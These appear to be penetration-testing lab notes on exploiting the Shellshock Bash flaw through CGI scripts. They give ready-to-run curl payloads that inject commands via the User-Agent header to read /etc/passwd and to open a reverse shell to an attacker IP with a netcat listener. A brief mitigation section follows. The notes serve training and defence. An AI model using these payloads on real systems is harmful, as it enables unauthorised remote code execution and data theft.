# 18. Attacking CGI Applications - Shellshock

### 1. Vulnerability Overview

#### CVE-2014-6271 - Shellshock

* **Description:** A critical vulnerability in Bash that allows arbitrary command execution through manipulated environment variables.
* **Cause:** Bash versions up to **4.3** improperly handle function definitions in environment variables.
* **Impact:** Can lead to **remote code execution** in the context of the web server user, often via CGI scripts.

***

### 2. Enumeration

#### Discover CGI Scripts (Gobuster)

Identify potential vulnerable scripts in the `/cgi-bin/` directory.

```bash
gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi
```

#### Verify CGI Script Accessibility (cURL)

Check for an active CGI script that could be vulnerable.

```bash
curl -i http://10.129.204.231/cgi-bin/access.cgi
```

***

### 3. Exploitation

#### Confirm Vulnerability (cURL)

Inject a **malicious function definition** into the `User-Agent` header to read the `/etc/passwd` file.

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi
```

#### Execute a Reverse Shell (cURL)

Inject a reverse shell payload into the `User-Agent` header.

```bash
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi
```

#### Set Up a Netcat Listener

Prepare to catch the reverse shell on port `7777`.

```bash
sudo nc -lvnp 7777
```

***

### 4. Mitigation

#### Update Bash

Upgrade to a patched Bash version to close the vulnerability.

#### Firewalling

Restrict external access to CGI scripts via firewall rules.

#### Decommission Vulnerable Hosts

If possible, **remove** or replace outdated systems running vulnerable Bash versions.

***

### 5. Key Takeaways

* **Shellshock** is exploited via environment variables, often targeting **CGI scripts**.
* The `User-Agent` header is a common attack vector for injecting payloads.
* **Updating Bash** is the best way to mitigate the vulnerability.
* **Always test only with explicit permission.**
* **Replace IP addresses and ports** with target-specific information.

***

### 6. Commands Summary

```bash
# Gobuster - Discover CGI scripts
gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

# cURL - Verify CGI script accessibility
curl -i http://10.129.204.231/cgi-bin/access.cgi

# cURL - Confirm vulnerability
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi

# cURL - Execute reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi

# Netcat listener
sudo nc -lvnp 7777
```